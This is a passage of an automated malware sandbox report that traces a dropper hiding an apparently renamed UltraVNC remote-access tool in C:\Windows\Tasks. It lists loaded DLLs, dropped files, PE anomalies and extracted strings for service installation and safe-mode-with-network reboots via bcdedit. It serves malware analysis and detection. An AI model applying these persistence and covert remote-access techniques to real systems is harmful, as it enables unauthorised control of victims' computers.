                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: sspicli.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winsta.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wldp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: riched20.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: usp10.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: msls31.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winmm.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: version.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: userenv.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wtsapi32.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: napinsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: wshbth.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: mswsock.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: winrnr.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\Tasks\browser_sn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Windows\Tasks\UltraVNC.iniJump to behavior
                            Source: C:\Windows\Tasks\browser_sn.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLL
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: T8xrZb7nBL.exeStatic file information: File size 1670955 > 1048576
                            Source: Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: uqVb3.kkb9h.0.drStatic PE information: 0x998FF43F [Tue Aug 22 20:17:03 2051 UTC]
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                            Source: T8xrZb7nBL.exeStatic PE information: real checksum: 0x2af97 should be: 0x1a1b11
                            Source: uqVb3.kkb9h.0.drStatic PE information: section name: .didat
                            Source: uqVb3.kkb9h.2.drStatic PE information: section name: .didat
                            Source: conhost.exe.8.drStatic PE information: section name: .didat
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00413660 push eax; ret 0_2_0041368E
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9DC01 push rcx; ret 23_2_00007FF6C2B9DC02
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA1400 push rbp; iretd 23_2_00007FF6C2BA1401
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9DC11 push rax; ret 23_2_00007FF6C2B9DC13
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B9DC21 push rsp; ret 23_2_00007FF6C2B9DC23
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BB8CF9 push 8B481074h; iretd 23_2_00007FF6C2BB8CFF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA12EF push rbp; iretd 23_2_00007FF6C2BA12F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA07F8 push rbp; iretd 23_2_00007FF6C2BA07F9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8FEF1 push rcx; ret 23_2_00007FF6C2B8FEF2
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9DC01 push rcx; ret 27_2_00007FF6C2B9DC02
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA1400 push rbp; iretd 27_2_00007FF6C2BA1401
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9DC11 push rax; ret 27_2_00007FF6C2B9DC13
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B9DC21 push rsp; ret 27_2_00007FF6C2B9DC23
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BB8CF9 push 8B481074h; iretd 27_2_00007FF6C2BB8CFF
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA12EF push rbp; iretd 27_2_00007FF6C2BA12F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA07F8 push rbp; iretd 27_2_00007FF6C2BA07F9
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8FEF1 push rcx; ret 27_2_00007FF6C2B8FEF2

                            Persistence and Installation Behavior

                            barindex
                            Drops executables to the windows directory (C:\Windows) and starts them
                            Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\Tasks\browser_sn.exe
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\browser_sn.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\browser_sn.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\conhost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\DygIR.vkc0fJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\uqVb3.kkb9hJump to dropped file
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\uqVb3.kkb9hJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\Xv6Ya.d8LhTJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\DygIR.vkc0fJump to dropped file
                            Source: Xv6Ya.d8LhT.2.drBinary or memory string: bcdedit.exe
                            Source: Xv6Ya.d8LhT.2.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                            Source: browser_sn.exe.8.drBinary or memory string: bcdedit.exe
                            Source: browser_sn.exe.8.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                            Source: Xv6Ya.d8LhT.0.drBinary or memory string: bcdedit.exe
                            Source: Xv6Ya.d8LhT.0.drBinary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7BD0 GetPrivateProfileIntA,23_2_00007FF6C2BD7BD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7C90 GetPrivateProfileIntA,23_2_00007FF6C2BD7C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat23_2_00007FF6C2B8E1D0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B881AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin23_2_00007FF6C2B881AD
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD9A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,23_2_00007FF6C2BD9A40
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD77F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,23_2_00007FF6C2BD77F0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,23_2_00007FF6C2BD7750
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7F50 GetPrivateProfileIntA,23_2_00007FF6C2BD7F50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD78E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,23_2_00007FF6C2BD78E0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7E10 GetPrivateProfileIntA,23_2_00007FF6C2BD7E10
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7D50 GetPrivateProfileIntA,23_2_00007FF6C2BD7D50
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7EB0 GetPrivateProfileIntA,23_2_00007FF6C2BD7EB0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BD7650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,23_2_00007FF6C2BD7650
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7BD0 GetPrivateProfileIntA,27_2_00007FF6C2BD7BD0
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BD7C90 GetPrivateProfileIntA,27_2_00007FF6C2BD7C90
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B8E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsp